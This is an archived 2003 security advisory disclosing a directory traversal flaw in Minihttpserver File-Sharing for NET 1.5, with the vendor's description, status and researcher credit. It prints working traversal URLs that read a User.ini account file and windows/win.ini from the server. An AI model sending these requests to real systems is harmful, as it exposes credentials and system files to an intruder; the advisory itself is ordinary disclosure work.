<<< Date Index >>>     <<< Thread Index >>>

Minihttpserver File-Sharing for NET Directory Traversal Vulnerability




Minihttpserver File-Sharing for NET Directory Traversal Vulnerability


Affected Systems: File-Sharing for NET

version: 1.5 (and possibly earlier versions)

Vendor: Minihttpserver - http://www.minihttpserver.net

Issue:  Directory Traversal Vulnerability

Released: 2 October 2003


Introduction:
=============
"File Sharing for net is a complete, secure web server that shares 
your business documents and files over the web: remote users only 
need browsers to view your files. Share, transfer files securely with 
colleagues."

- Vendors Description
   [ http://www.minihttpserver.net ]


Details:
========
File-Sharing for NET has a Directory Traversal Vulnerability Using 
the string '../' or '..\' in a URL, an attacker can gain read access 
to any file outside of the intended web-published file system 
directory.

http://[target]/../../../existing_file

http://[target]\..\..\..\existing_file

Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini

http://127.0.0.1/../../../windows/win.ini


Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:

http://www.minihttpserver.net/fbbs.zip


Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh@xxxxxxxxxxx
http://www.bsecurity.tk